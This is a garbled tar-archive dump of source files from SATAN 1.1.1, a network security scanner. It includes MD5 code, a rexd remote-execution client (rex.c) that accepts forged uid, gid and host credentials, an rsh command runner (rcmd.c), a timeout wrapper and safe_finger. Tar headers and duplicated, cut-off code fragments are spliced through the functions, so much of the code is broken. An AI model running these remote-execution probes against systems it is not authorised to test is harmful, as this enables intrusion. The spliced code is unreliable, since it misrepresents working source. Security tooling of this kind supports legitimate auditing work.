(d)) + (x) + (UINT4)(ac); \ (a) = ROTATE_LEFT ((a), (s)); \ (a) += (b); \ } #define HH(a, b, c, d, x, s, ac) { \ (a) += H ((b), (c), (d)) + (x) + (UINT4)(ac); \ (a) = ROTATE_LEFT ((a), (s)); \ (a) += (b); \ } #define II(a, b, c, d, x, s, ac) { \ (a) += I ((b), (c), (d)) + (x) + (UINT4)(ac); \ (a) = ROTATE_LEFT ((a), (s)); \ (a) += (b); \ } /* MD5 initialization. Begins an MD5 operation, writing a new context. */ void MD5Init (context) MD5_CTX *context; /* context */ { context->count[0] = context->count[1] = 0; /* Load magic initialization constants. */ context->state[0] = 0x67452301; context->state[1] = 0xefcdab89; context->state[2] = 0x98badcfe; context->state[3] = 0x10325476; } /* MD5 block update operation. Continues an MD5 message-digest operation, processing another message block, and updating the context. */ void MD5Update (context, input, inputLen) MD5_CTX *context; /* context */ unsigned char *input; /* input block */ unsigned int inputLen; /* length of input block */ { unsigned int i, index, partLen; /* Compute number of bytes mod 64 */ index = (unsigned int)((context->count[0] >> 3) & 0x3F); /* Update number of bits */ if ((context->count[0] += ((UINT4)inputLen << 3)) < ((UINT4)inputLen << 3)) context->count[1]++; context->count[1] += ((UINT4)inputLen >> 29); partLen = 64 - index; /* Transform as many times as possible. */ if (inputLen >= partLen) { MD5_memcpy ((POINTER)&context->buffer[index], (POINTER)input, partLen); MD5Transform (context->state, context->buffer); for (i = partLen; i + 63 < inputLen; i += 64) MD5Transform (context->state, &input[i]); index = 0; } else i = 0; /* Buffer remaining input */ MD5_memcpy ((POINTER)&context->buffer[index], (POINTER)&input[i], inputLen-i); } /* MD5 finalization. Ends an MD5 message-digest operation, writing the the message digest and zeroizing the context. */ void MD5Final (digest, context) unsigned char digest[16]; /* message digest */ MD5_CTX *context; /* context */ { unsigned char bits[8]; unsigned int index, padLen; /* Save number of bits */ Encode (bits, context->count, 8); /* Pad out to 56 mod 64. */ index = (unsigned int)((context->count[0] >> 3) & 0x3f); padLen = (index < 56) ? (56 - index) : (120 - index); MD5Update (context, PADDING, padLen); /* Append length (before padding) */ MD5Update (context, bits, 8); /* Store state in digest */ Encode (digest, context->state, 16); /* Zeroize sensitive information. */ MD5_memset ((POINTER)context, 0, sizeof (*context)); } /* MD5 basic transformation. Transforms state based on block. */ static void MD5Transform (state, block) UINT4 state[4]; unsigned char block[64]; { UINT4 a = state[0], b = state[1], c = state[2], d = state[3], x[16]; Decode (x, block, 64); /* Round 1 */ FF (a, b, c, d, x[ 0], S11, 0xd76aa478); /* 1 */ FF (d, a, b, c, x[ 1], S12, 0xe8c7b756); /* 2 */ FF (c, d, a, b, x[ 2], S13, 0x242070db); /* 3 */ FF (b, c, d, a, x[ 3], S14, 0xc1bdceee); /* 4 */ FF (a, b, c, d, x[ 4], S11, 0xf57c0faf); /* 5 */ FF (d, a, b, c, x[ 5], S12, 0x4787c62a); /* 6 */ FF (c, d, a, b, x[ 6], S13, 0xa8304613); /* 7 */ FF (b, c, d, a, x[ 7], S14, 0xfd469501); /* 8 */ FF (a, b, c, d, x[ 8], S11, 0x698098d8); /* 9 */ FF (d, a, b, c, x[ 9], S12, 0x8b44f7af); /* 10 */ FF (c, d, a, b, x[10], S13, 0xffff5bb1); /* 11 */ FF (b, c, d, a, x[11], S14, 0x895cd7be); /* 12 */ FF (a, b, c, d, x[12], S11, 0x6b901122); /* 13 */ FF (d, a, b, c, x[13], S12, 0xfd987193); /* 14 */ FF (c, d, a, b, x[14], S13, 0xa679438e); /* 15 */ FF (b, c, d, a, x[15], S14, 0x49b40821); /* 16 */ /* Round 2 */ GG (a, b, c, d, x[ 1], S21, 0xf61e2562); /* 17 */ GG (d, a, b, c, x[ 6], S22, 0xc040b340); /* 18 */ GG (c, d, a, b, x[11], S23, 0x265e5a51); /* 19 */ GG (b, c, d, a, x[ 0], S24, 0xe9b6c7aa); /* 20 */ GG (a, b, c, d, x[ 5], S21, 0xd62f105d); /* 21 */ GG (d, a, b, c, x[10], S22, 0x2441453); /* 22 */ GG (c, d, a, b, x[15], S23, 0xd8a1e681); /* 23 */ GG (b, c, d, a, x[ 4], S24, 0xe7d3fbc8); /* 24 */ GG (a, b, c, d, x[ 9], S21, 0x21e1cde6); /* 25 */ GG (d, a, b, c, x[14], S22, 0xc33707d6); /* 26 */ GG (c, d, a, b, x[ 3], S23, 0xf4d50d87); /* 27 */ GG (b, c, d, a, x[ 8], S24, 0x455a14ed); /* 28 */ GG (a, b, c, d, x[13], S21, 0xa9e3e905); /* 29 */ GG (d, a, b, c, x[ 2], S22, 0xfcefa3f8); /* 30 */ GG (c, d, a, b, x[ 7], S23, 0x676f02d9); /* 31 */ GG (b, c, d, a, x[12], S24, 0x8d2a4c8a); /* 32 */ /* Round 3 */ HH (a, b, c, d, x[ 5], S31, 0xfffa3942); /* 33 */ HH (d, a, b, c, x[ 8], S32, 0x8771f681); /* 34 */ HH (c, d, a, b, x[11], S33, 0x6d9d6122); /* 35 */ HH (b, c, d, a, x[14], S34, 0xfde5380c); /* 36 */ HH (a, b, c, d, x[ 1], S31, 0xa4beea44); /* 37 */ HH (d, a, b, c, x[ 4], S32, 0x4bdecfa9); /* 38 */ HH (c, d, a, b, x[ 7], S33, 0xf6bb4b60); /* 39 */ HH (b, c, d, a, x[10], S34, 0xbebfbc70); /* 40 */ HH (a, b, c, d, x[13], S31, 0x289b7ec6); /* 41 */ HH (d, a, b, c, x[ 0], S32, 0xeaa127fa); /* 42 */ HH (c, d, a, b, x[ 3], S33, 0xd4ef3085); /* 43 */ HH (b, c, d, a, x[ 6], S34, 0x4881d05); /* 44 */ HH (a, b, c, d, x[ 9], S31, 0xd9d4d039); /* 45 */ HH (d, a, b, c, x[12], S32, 0xe6db99e5); /* 46 */ HH (c, d, a, b, x[15], S33, 0x1fa27cf8); /* 47 */ HH (b, c, d, a, x[ 2], S34, 0xc4ac5665); /* 48 */ /* Round 4 */ II (a, b, c, d, x[ 0], S41, 0xf4292244); /* 49 */ II (d, a, b, c, x[ 7], S42, 0x432aff97); /* 50 */ II (c, d, a, b, x[14], S43, 0xab9423a7); /* 51 */ II (b, c, d, a, x[ 5], S44, 0xfc93a039); /* 52 */ II (a, b, c, d, x[12], S41, 0x655b59c3); /* 53 */ II (d, a, b, c, x[ 3], S42, 0x8f0ccc92); /* 54 */ II (c, d, a, b, x[10], S43, 0xffeff47d); /* 55 */ II (b, c, d, a, x[ 1], S44, 0x85845dd1); /* 56 */ II (a, b, c, d, x[ 8], S41, 0x6fa87e4f); /* 57 */ II (d, a, b, c, x[15], S42, 0xfe2ce6e0); /* 58 */ II (c, d, a, b, x[ 6], S43, 0xa3014314); /* 59 */ II (b, c, d, a, x[13], S44, 0x4e0811a1); /* 60 */ II (a, b, c, d, x[ 4], S41, 0xf7537e82); /* 61 */ II (d, a, b, c, x[11], S42, 0xbd3af235); /* 62 */ II (c, d, a, b, x[ 2], S43, 0x2ad7d2bb); /* 63 */ II (b, c, d, a, x[ 9], S44, 0xeb86d391); /* 64 */ state[0] += a; state[1] += b; state[2] += c; state[3] += d; /* Zeroize sensitive information. */ MD5_memset ((POINTER)x, 0, sizeof (x)); } /* Encodes input (UINT4) into output (unsigned char). Assumes len is a multiple of 4. */ static void Encode (output, input, len) unsigned char *output; UINT4 *input; unsigned int len; { unsigned int i, j; for (i = 0, j = 0; j < len; i++, j += 4) { output[j] = (unsigned char)(input[i] & 0xff); output[j+1] = (unsigned char)((input[i] >> 8) & 0xff); output[j+2] = (unsigned char)((input[i] >> 16) & 0xff); output[j+3] = (unsigned char)((input[i] >> 24) & 0xff); } } /* Decodes input (unsigned char) into output (UINT4). Assumes len is a multiple of 4. */ static void Decode (output, input, len) UINT4 *output; unsigned char *input; unsigned int len; { unsigned int i, j; for (i = 0, j = 0; j < len; i++, j += 4) output[i] = ((UINT4)input[j]) | (((UINT4)input[j+1]) << 8) | (((UINT4)input[j+2]) << 16) | (((UINT4)input[j+3]) << 24); } /* Note: Replace "for loop" with standard memcpy if possible. */ static void MD5_memcpy (output, input, len) POINTER output; POINTER input; unsigned int len; { unsigned int i; for (i = 0; i < len; i++) output[i] = input[i]; } /* Note: Replace "for loop" with standard memset if possible. */ static void MD5_memset (output, value, len) POINTER output; int value; unsigned int len; { unsigned int i; for (i = 0; i < len; i++) ((char *)output)[i] = (char)value; } 15 */ FF (b, c, d, a, x[15], S14, 0x49b40821); /* 16 */ /* Round 2 */ GG (a, b, c, d, x[ 1], S21, 0xf61e2562); /* 17 */ GG (d, a, b, c, x[ 6], S22, 0xc040b340); /* 18 */ GG (c, d, a, b, x[11], S23, 0x265e5a51); /* 19 */ GG (b, c, d, a, x[ 0], S24, 0xe9b6c7aa); /* 20 */ GG (a, b, c, d, x[ 5], S21, 0xd62f105d); /* 2satan-1.1.1/src/misc/rex.c.......................................................................... 600 . 465 . 506 . 13615 5727123065 10412. ...................................................... ................................................................................................................................................................................................................................................................. ............................................. /* * rex - simplified rexd client. Usage: rex [-a authinfo] server command... * * Author: Wietse Venema */ /* System libraries. */ #include <sys/types.h> #include <sys/socket.h> #include <sys/time.h> #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <netdb.h> #include <memory.h> #include <string.h> /* * Sun now wants us to #define PORTMAP or things fall apart. */ #define PORTMAP #include <rpc/rpc.h> extern int optind; extern char *optarg; /* * Many <rpc/rex.h> versions depend on the historical sgttyb * terminal control structure. We must use our on version. */ #include "rex.h" /* Local stuff. */ static char *progname; static CLIENT *rex_server(); static AUTH *rex_auth(); static int rex_command(); static void rex_startup(); static void do_io(); static int rex_exit(); static int stream_port(); /* Defaults. */ static struct timeval timeout = {10, 0}; static char *serv_env[] = { "PATH=/usr/ucb:/bin:/usr/bin", 0, }; static void usage() { printf("Usage: %s [-a authinfo] server command...\n", progname); exit(1); } main(argc, argv) int argc; char **argv; { int c; CLIENT *client; int server_sock; char *auth = 0; progname = argv[0]; while ((c = getopt(argc, argv, "a:")) != EOF) { .switch (c) { .case 'a': . auth = optarg; . break; .default: . usage(); .} } argc -= optind; argv += optind; if (argc < 2) .usage(); /* Establish rexd server, run command, and clean up. */ client = rex_server(argv[0]); client->cl_auth = (auth == 0) ? authunix_create_default() : rex_auth(auth); server_sock = rex_command(client, argv[0], argv + 1); do_io(server_sock); return (rex_exit(client, server_sock)); } /* rex_server - establish rexd server instance */ static CLIENT *rex_server(server_name) char *server_name; { struct hostent *hp; struct sockaddr_in server_addr; int sock = RPC_ANYSOCK; CLIENT *client; /* Find server's IP address. */ if ((hp = gethostbyname(server_name)) == 0) { .fprintf(stderr, "%s: host not found\n", server_name); .exit(1); } /* XXX should iterate over all IP addresses. */ server_addr.sin_family = AF_INET; memcpy((caddr_t) & server_addr.sin_addr, hp->h_addr, hp->h_length); server_addr.sin_port = 0; if ((client = clnttcp_create(&server_addr, .... REXPROG, REXVERS, .... &sock, 0, 0)) == 0) { .fprintf(stderr, "%s: ", server_name); .clnt_pcreateerror(server_name); .fprintf(stderr, "\n"); .exit(1); } return (client); } /* rex_auth - handle explicit credentials */ static AUTH *rex_auth(auth) char *auth; { char host[BUFSIZ]; int uid; AUTH_GID_T gid; if (sscanf(auth, "%[^,],%d,%d", host, &uid, &gid) != 3) .usage(); return (authunix_create(host, uid, gid, 1, &gid)); } /* rex_command - open socket to remote command */ static int rex_command(client, server_name, command) CLIENT *client; char *server_name; char **command; { static rex_start rx_start; static rex_result rx_result; enum clnt_stat stat; int sock; int server_sock; char cwd_host[BUFSIZ]; char **cpp; sscanf(server_name, "%[^.]", cwd_host);./* XXX for old servers */ rx_start.rst_cmd.rst_cmd_val = command; for (cpp = command; *cpp; cpp++) . /* void */ ; rx_start.rst_cmd.rst_cmd_len = cpp - command; rx_start.rst_host = cwd_host;../* cwd server */ rx_start.rst_fsname = "";.../* cwd file system */ rx_start.rst_dirwithin = "";../* cwd offset */ rx_start.rst_env.rst_env_val = serv_env; for (cpp = serv_env; *cpp; cpp++) . /* void */ ; rx_start.rst_env.rst_env_len = cpp - serv_env; rx_start.rst_port0 = stream_port(&sock); rx_start.rst_port1 = rx_start.rst_port0; rx_start.rst_port2 = rx_start.rst_port1; rx_start.rst_flags = 0; if (stat = clnt_call(client, REXPROC_START, ... xdr_rex_start, (void *) &rx_start, ... xdr_rex_result, (void *) &rx_result, ... timeout)) { .fprintf(stderr, "%s: ", progname); .clnt_perrno(stat); .fprintf(stderr, "\n"); .exit(1); } if (rx_result.rlt_stat) { .fprintf(stderr, "%s: %s\n", progname, rx_result.rlt_message); .exit(1); } if ((server_sock = accept(sock, (struct sockaddr *) 0, (int *) 0)) < 0) { .perror("accept"); .exit(1); } close(sock); return (server_sock); } /* do_io - shuffle bits across the network */ static void do_io(sock) int sock; { char buf[BUFSIZ]; int count; shutdown(sock, 1);..../* make server read EOF */ while ((count = read(sock, buf, sizeof(buf))) > 0) .write(1, buf, count); } /* rex_exit - terminate remote command and get its exit status */ static int rex_exit(client, server_sock) CLIENT *client; int server_sock; { static struct rex_result rx_result; enum clnt_stat stat; close(server_sock); if (stat = clnt_call(client, REXPROC_WAIT, ... xdr_void, (void *) 0, ... xdr_rex_result, (void *) &rx_result, ... timeout)) { .fprintf(stderr, "%s ", progname); .clnt_perrno(stat); .fprintf(stderr, "\n"); .exit(1); } return (rx_result.rlt_stat); } /* stream_port - create ready-to-accept socket and return port number */ static int stream_port(sockp) int *sockp; { struct sockaddr_in sin; int sock; int len; /* Create socket. */ if ((sock = socket(AF_INET, SOCK_STREAM, 0)) < 0) { .perror("socket"); .exit(1); } /* Bind the socket to some random port. */ memset((char *) &sin, 0, sizeof(sin)); sin.sin_family = AF_INET; if (bind(sock, (struct sockaddr *) & sin, sizeof(sin)) < 0) { .perror("bind"); .exit(1); } /* Find out the socket's port number. */ len = sizeof(sin); if (getsockname(sock, (struct sockaddr *) & sin, &len) < 0) { .perror("getsockname"); .exit(1); } /* Make the socket ready to receive connections. */ if (listen(sock, 1) < 0) { .perror("listen"); .exit(1); } *sockp = sock; return (htons(sin.sin_port)); } ) CLIENT *client; char *server_name; char **command; { static rex_start rx_start; static rex_result rx_rsatan-1.1.1/src/misc/timeout.c...................................................................... 600 . 465 . 506 . 3123 5740245125 11250. ........................................................................... ................................................................................................................................................................................................................................................................. ........................ /* * timeout - run a command for a limited amount of time * * Uses POSIX process groups so that we do the right thing when the controlled * command forks off child processes. * * Author: Wietse Venema. */ /* System libraries. */ #include <sys/types.h> #include <signal.h> #include <stdlib.h> #include <unistd.h> #include <stdio.h> extern int optind; /* Application-specific. */ #define perrorexit(s) { perror(s); exit(1); } static int kill_signal = SIGKILL; static char *progname; static void usage() { fprintf(stderr, "usage: %s [-signal] time command...\n", progname); exit(1); } static void terminate(sig) int sig; { kill(0, kill_signal); } int main(argc, argv) int argc; char **argv; { int time_to_run; pid_t pid; pid_t child_pid; int status; progname = argv[0]; /* * Parse JCL. */ while (--argc && *++argv && **argv == '-') .if ((kill_signal = atoi(*argv + 1)) <= 0) . usage(); if (argc < 2 || (time_to_run = atoi(argv[0])) <= 0) .usage(); /* * Run the command and its watchdog in a separate process group so that * both can be killed of with one signal. */ setsid(); switch (child_pid = fork()) { case -1:...../* error */ .perrorexit("timeout: fork"); case 00:...../* run controlled command */ .execvp(argv[1], argv + 1); .perrorexit(argv[1]); default:...../* become watchdog */ .(void) signal(SIGALRM, terminate); .alarm(time_to_run); .while ((pid = wait(&status)) != -1 && pid != child_pid) . /* void */ ; .return (pid == child_pid ? status : -1); } } , progname, rx_result.rlt_message); .exit(1); } if ((server_sock = accept(sock, (struct sockaddr *) 0, (int *) 0)) < 0) { .perror("accept"); .exit(1); } close(sock); return (server_sock); } /* do_io - shuffle bits across the network */ static void do_io(sock) int sock; { char buf[BUFSIZ]; int count; shutdown(sock, 1);..../* make server read EOF */ while ((count = read(sock, busatan-1.1.1/src/misc/rex.x.......................................................................... 400 . 465 . 506 . 16222 5664357622 10442. .................................................................... ................................................................................................................................................................................................................................................................. .............................../* * Sun RPC is a product of Sun Microsystems, Inc. and is provided for * unrestricted use provided that this legend is included on all tape * media and as a part of the software program in whole or part. Users * may copy or modify Sun RPC without charge, but are not authorized * to license or distribute it to anyone else except as part of a product or * program developed by the user. * * SUN RPC IS PROVIDED AS IS WITH NO WARRANTIES OF ANY KIND INCLUDING THE * WARRANTIES OF DESIGN, MERCHANTIBILITY AND FITNESS FOR A PARTICULAR * PURPOSE, OR ARISING FROM A COURSE OF DEALING, USAGE OR TRADE PRACTICE. * * Sun RPC is provided with no support and without any obligation on the * part of Sun Microsystems, Inc. to assist in its use, correction, * modification or enhancement. * * SUN MICROSYSTEMS, INC. SHALL HAVE NO LIABILITY WITH RESPECT TO THE * INFRINGEMENT OF COPYRIGHTS, TRADE SECRETS OR ANY PATENTS BY SUN RPC * OR ANY PART THEREOF. * * In no event will Sun Microsystems, Inc. be liable for any lost revenue * or profits or other special, indirect and consequential damages, even if * Sun has been advised of the possibility of such damages. * * Sun Microsystems, Inc. * 2550 Garcia Avenue * Mountain View, California 94043 */ /* * Remote execution (rex) protocol specification */ #ifndef RPC_HDR %#ifndef lint %/*static char sccsid[] = "from: @(#)rex.x 1.3 87/09/18 Copyr 1987 Sun Micro";*/ %/*static char sccsid[] = "from: @(#)rex.x.2.1 88/08/01 4.0 RPCSRC";*/ %static char rcsid[] = "$Id: rex.x,v 1.1 1994/08/04 19:01:49 wollman Exp $"; %#endif /* not lint */ #endif const STRINGSIZE = 1024; typedef string rexstring<1024>; /* * values to pass to REXPROC_SIGNAL */ const SIGINT = 2;./* interrupt */ /* * Values for rst_flags, below */ const REX_INTERACTIVE = 1;./* interactive mode */ struct rex_start { .rexstring rst_cmd<>;./* list of command and args */ .rexstring rst_host;./* working directory host name */ .rexstring rst_fsname;./* working directory file system name */ .rexstring rst_dirwithin;/* working directory within file system */ .rexstring rst_env<>;./* list of environment */ .unsigned int rst_port0;./* port for stdin */ .unsigned int rst_port1;./* port for stdout */ .unsigned int rst_port2;./* port for stderr */ .unsigned int rst_flags;./* options - see const above */ }; struct rex_result { .int rlt_stat;../* integer status code */ .rexstring rlt_message;./* string message for human consumption */ }; struct sgttyb { .unsigned four;./* always equals 4 */ .opaque chars[4]; ./* chars[0] == input speed */ ./* chars[1] == output speed */ ./* chars[2] == kill character */ ./* chars[3] == erase character */ .unsigned flags; }; /* values for speeds above (baud rates) */ const B0 = 0; const B50 = 1; const B75 = 2; const B110 = 3; const B134 = 4; const B150 = 5; const B200 = 6; const B300 = 7; const B600 = 8; const B1200 = 9; const B1800 = 10; const B2400 = 11; const B4800 = 12; const B9600 = 13; const B19200 = 14; const B38400 = 15; /* values for flags above */ const TANDEM = 0x00000001; /* send stopc on out q full */ const CBREAK = 0x00000002; /* half-cooked mode */ const LCASE = 0x00000004; /* simulate lower case */ const ECHO = 0x00000008; /* echo input */ const CRMOD = 0x00000010; /* map \r to \r\n on output */ const RAW = 0x00000020; /* no i/o processing */ const ODDP = 0x00000040; /* get/send odd parity */ const EVENP = 0x00000080; /* get/send even parity */ const ANYP = 0x000000c0; /* get any parity/send none */ const NLDELAY = 0x00000300; /* \n delay */ const NL0 = 0x00000000; const NL1 = 0x00000100; /* tty 37 */ const NL2 = 0x00000200; /* vt05 */ const NL3 = 0x00000300; const TBDELAY = 0x00000c00; /* horizontal tab delay */ const TAB0 = 0x00000000; const TAB1 = 0x00000400; /* tty 37 */ const TAB2 = 0x00000800; const XTABS = 0x00000c00; /* expand tabs on output */ const CRDELAY = 0x00003000; /* \r delay */ const CR0 = 0x00000000; const CR1 = 0x00001000; /* tn 300 */ const CR2 = 0x00002000; /* tty 37 */ const CR3 = 0x00003000; /* concept 100 */ const VTDELAY = 0x00004000; /* vertical tab delay */ const FF0 = 0x00000000; const FF1 = 0x00004000; /* tty 37 */ const BSDELAY = 0x00008000; /* \b delay */ const BS0 = 0x00000000; const BS1 = 0x00008000; const CRTBS = 0x00010000; /* do backspacing for crt */ const PRTERA = 0x00020000; /* \ ... / erase */ const CRTERA = 0x00040000; /* " \b " to wipe out char */ const TILDE = 0x00080000; /* hazeltine tilde kludge */ const MDMBUF = 0x00100000; /* start/stop output on carrier intr */ const LITOUT = 0x00200000; /* literal output */ const TOSTOP = 0x00400000; /* SIGTTOU on background output */ const FLUSHO = 0x00800000; /* flush output to terminal */ const NOHANG = 0x01000000; /* no SIGHUP on carrier drop */ const L001000 = 0x02000000; const CRTKIL = 0x04000000; /* kill line with " \b " */ const PASS8 = 0x08000000; const CTLECH = 0x10000000; /* echo control chars as ^X */ const PENDIN = 0x20000000; /* tp->t_rawq needs reread */ const DECCTQ = 0x40000000; /* only ^Q starts after ^S */ const NOFLSH = 0x80000000; /* no output flush on signal */ struct tchars { .unsigned six;./* always equals 6 */ .opaque chars[6]; ./* chars[0] == interrupt char */ ./* chars[1] == quit char */ ./* chars[2] == start output char */ ./* chars[3] == stop output char */ ./* chars[4] == end-of-file char */ ./* chars[5] == input delimeter (like nl) */ }; struct ltchars { .unsigned six;./* always equals 6 */ .opaque chars[6]; ./* chars[0] == stop process signal */ ./* chars[1] == delayed stop process signal */ ./* chars[2] == reprint line */ ./* chars[3] == flush output */ ./* chars[4] == word erase */ ./* chars[5] == literal next character */ .unsigned mode; }; struct rex_ttysize { .int ts_lines; .int ts_cols; }; struct rex_ttymode { sgttyb basic; /* standard unix tty flags */ tchars more; /* interrupt, kill characters, etc. */ ltchars yetmore; /* special Berkeley characters */ unsigned andmore; /* and Berkeley modes */ }; /* values for andmore above */ const LCRTBS = 0x0001;./* do backspacing for crt */ const LPRTERA = 0x0002;./* \ ... / erase */ const LCRTERA = 0x0004;./* " \b " to wipe out char */ const LTILDE = 0x0008;./* hazeltine tilde kludge */ const LMDMBUF = 0x0010;./* start/stop output on carrier intr */ const LLITOUT = 0x0020;./* literal output */ const LTOSTOP = 0x0040;./* SIGTTOU on background output */ const LFLUSHO = 0x0080;./* flush output to terminal */ const LNOHANG = 0x0100;./* no SIGHUP on carrier drop */ const LL001000 = 0x0200; const LCRTKIL = 0x0400;./* kill line with " \b " */ const LPASS8 = 0x0800; const LCTLECH = 0x1000;./* echo control chars as ^X */ const LPENDIN = 0x2000;./* needs reread */ const LDECCTQ = 0x4000;./* only ^Q starts after ^S */ const LNOFLSH = 0x8000;./* no output flush on signal */ program REXPROG { .version REXVERS { ../* .. * Start remote execution .. */ ..rex_result ..REXPROC_START(rex_start) = 1; ../* .. * Wait for remote execution to terminate .. */ ..rex_result ..REXPROC_WAIT(void) = 2; ../* .. * Send tty modes .. */ ..void ..REXPROC_MODES(rex_ttymode) = 3; ../* .. * Send window size change .. */ ..void ..REXPROC_WINCH(rex_ttysize) = 4; ../* .. * Send other signal .. */ ..void ..REXPROC_SIGNAL(int) = 5; .} = 1; } = 100017; t ECHO = 0x00000008; /* echo input */ const CRMOD = 0x00000010; /* map \r to \r\n on output */ const RAW = 0x00000020; /* no i/o processing */ const ODDP = 0x00000040; /* get/send odd parity */ const EVENP = 0x00000080; /* get/send even parity */ const ANYP = 0x000000c0; /* get any parity/send none */ const NLDELAY = 0x00000300; /* \n delay */ const NL0 = 0x00000satan-1.1.1/src/misc/sys_socket.c................................................................... 600 . 465 . 506 . 721 5740245116 11731. ................................................................................. ................................................................................................................................................................................................................................................................. .................. /* * Many PERL installations have no sys/socket.ph file, and with many * installations, the sys/*.ph files are broken. This is a bizarre * workaround: a C program to bootstrap a PERL application. * * Author: Wietse Venema. */ #include <sys/types.h> #include <sys/socket.h> int main(argc, argv) int argc; char **argv; { printf("sub AF_INET { %d; }\n", AF_INET); printf("sub SOCK_STREAM { %d; }\n", SOCK_STREAM); printf("1;\n"); } " \b " */ const LPASS8 = 0x0800; const LCTLECHsatan-1.1.1/src/misc/rcmd.c......................................................................... 600 . 465 . 506 . 1372 5741556533 10524. ........................................................................................ ................................................................................................................................................................................................................................................................. .........../* rcmd - remote command execution */ #include <sys/types.h> #include <stdio.h> #include <netdb.h> main(argc, argv) int argc; char **argv; { char buffer[BUFSIZ]; struct servent *sp; int s; int n; if (argc != 4) { .fprintf(stderr, "usage: %s host user 'command'\n", argv[0]); .return (1); } if (geteuid()) { .fprintf(stderr, "test needs root privileges\n"); .return (1); } sp = getservbyname("shell", "tcp"); if (sp == 0) { .fprintf(stderr, "unknown service: shell/tcp\n"); .return (1); } s = rcmd(argv + 1, sp->s_port, argv[2], argv[2], argv[3], NULL); if (s >= 0) { .while ((n = read(s, buffer, sizeof(buffer))) > 0) . write(1, buffer, n); .return (0); } else { .return (1); } } remote execution .. */ ..rex_result ..REXPROC_START(rex_start) = 1; ../* .. * Wait for remote execution to terminate .. */ ..rex_result ..REXPROC_WAIT(void) = 2; ../* .. * Send tty modes .. */ ..void ..REXPROC_MODES(rex_ttymode) = 3; ../* .. * Send window sisatan-1.1.1/src/misc/safe_finger.c.................................................................. 400 . 465 . 506 . 11756 5733362522 12066. .................................................................................. ................................................................................................................................................................................................................................................................. ................. /* * safe_finger - finger client wrapper that protects against nasty stuff * from finger servers. Use this program for automatic reverse finger * probes, not the raw finger command. * * Build with: cc -o safe_finger safe_finger.c * * The problem: some programs may react to stuff in the first column. Other * programs may get upset by thrash anywhere on a line. File systems may * fill up as the finger server keeps sending data. Text editors may bomb * out on extremely long lines. The finger server may take forever because * it is somehow wedged. The code below takes care of all this badness. * * Author: Wietse Venema, Eindhoven University of Technology, The Netherlands. */ #ifndef lint static char sccsid[] = "@(#) safe_finger.c 1.4 94/12/28 17:42:41"; #endif /* System libraries */ #include <sys/types.h> #include <sys/stat.h> #include <signal.h> #include <stdio.h> #include <ctype.h> #include <pwd.h> extern void exit(); /* Local stuff */ char path[] = "PATH=/bin:/usr/bin:/usr/ucb:/usr/bsd:/etc:/usr/etc:/usr/sbin"; #define.TIME_LIMIT.60../* Do not keep listinging forever */ #define.INPUT_LENGTH.100000../* Do not keep listinging forever */ #define.LINE_LENGTH.128../* Editors can choke on long lines */ #define.FINGER_PROGRAM."finger"./* Most, if not all, UNIX systems */ #define.UNPRIV_NAME."nobody"./* Preferred privilege level */ #define.UNPRIV_UGID.32767../* Default uid and gid */ int finger_pid; void cleanup(sig) int sig; { kill(finger_pid, SIGKILL); exit(0); } main(argc, argv) int argc; char **argv; { int c; int line_length = 0; int finger_status; int wait_pid; int input_count = 0; struct passwd *pwd; /* * First of all, let's don't run with superuser privileges. */ if (getuid() == 0 || geteuid() == 0) { .if ((pwd = getpwnam(UNPRIV_NAME)) && pwd->pw_uid > 0) { . setgid(pwd->pw_gid); . setuid(pwd->pw_uid); .} else { . setgid(UNPRIV_UGID); . setuid(UNPRIV_UGID); .} } /* * Redirect our standard input through the raw finger command. */ if (putenv(path)) { .fprintf(stderr, "%s: putenv: out of memory", argv[0]); .exit(1); } argv[0] = FINGER_PROGRAM; finger_pid = pipe_stdin(argv); /* * Don't wait forever (Peter Wemm <peter@gecko.DIALix.oz.au>). */ signal(SIGALRM, cleanup); (void) alarm(TIME_LIMIT); /* * Main filter loop. */ while ((c = getchar()) != EOF) { .if (input_count++ >= INPUT_LENGTH) {./* don't listen forever */ . fclose(stdin); . printf("\n\n Input truncated to %d bytes...\n", input_count - 1); . break; .} .if (c == '\n') {.../* good: end of line */ . putchar(c); . line_length = 0; .} else { . if (line_length >= LINE_LENGTH) {./* force end of line */ ..printf("\\\n"); ..line_length = 0; . } . if (line_length == 0) {../* protect left margin */ ..putchar(' '); ..line_length++; . } . if (isascii(c) && (isprint(c) || isspace(c))) {./* text */ ..if (c == '\\') { .. putchar(c); .. line_length++; ..} ..putchar(c); ..line_length++; . } else {..../* quote all other thash */ ..printf("\\%03o", c & 0377); ..line_length += 4; . } .} } /* * Wait until the finger child process has terminated and account for its * exit status. Which will always be zero on most systems. */ while ((wait_pid = wait(&finger_status)) != -1 && wait_pid != finger_pid) . /* void */ ; return (wait_pid != finger_pid || finger_status != 0); } /* perror_exit - report system error text and terminate */ void perror_exit(text) char *text; { perror(text); exit(1); } /* pipe_stdin - pipe stdin through program (from my ANSI to OLD C converter) */ int pipe_stdin(argv) char **argv; { int pipefds[2]; int pid; int i; struct stat st; /* * The code that sets up the pipe requires that file descriptors 0,1,2 * are already open. All kinds of mysterious things will happen if that * is not the case. The following loops makes sure that descriptors 0,1,2 * are set up properly. */ for (i = 0; i < 3; i++) { .if (fstat(i, &st) == -1 && open("/dev/null", 2) != i) . perror_exit("open /dev/null"); } /* * Set up the pipe that interposes the command into our standard input * stream. */ if (pipe(pipefds)) .perror_exit("pipe"); switch (pid = fork()) { case -1:...../* error */ .perror_exit("fork"); ./* NOTREACHED */ case 0:...../* child */ .(void) close(pipefds[0]);../* close reading end */ .(void) close(1);.../* connect stdout to pipe */ .if (dup(pipefds[1]) != 1) . perror_exit("dup"); .(void) close(pipefds[1]);../* close redundant fd */ .(void) execvp(argv[0], argv); .perror_exit(argv[0]); ./* NOTREACHED */ default:...../* parent */ .(void) close(pipefds[1]);../* close writing end */ .(void) close(0);.../* connect stdin to pipe */ .if (dup(pipefds[0]) != 0) . perror_exit("dup"); .(void) close(pipefds[0]);../* close redundant fd */ .return (pid); } } SIGKILL); exisatan-1.1.1/src/nfs-chk/............................................................................ 700 . 465 . 506 . 0 5742521552 7731. .............................................................................................. ................................................................................................................................................................................................................................................................. .....satan-1.1.1/src/nfs-chk/Makefile.................................................................... 600 . 465 . 506 . 1310 5741523034 11447. ................................................................................................ ................................................................................................................................................................................................................................................................. ...SHELL.= /bin/sh BIN.= ../../bin OBJECTS.= nfs-chk.o nfs_prot_clnt.o nfs_prot_xdr.o mount_clnt.o mount_xdr.o MAKES.= nfs_prot.h nfs_prot_clnt.c nfs_prot_svc.c nfs_prot_xdr.c mount.h \ .mount_clnt.c mount_svc.c 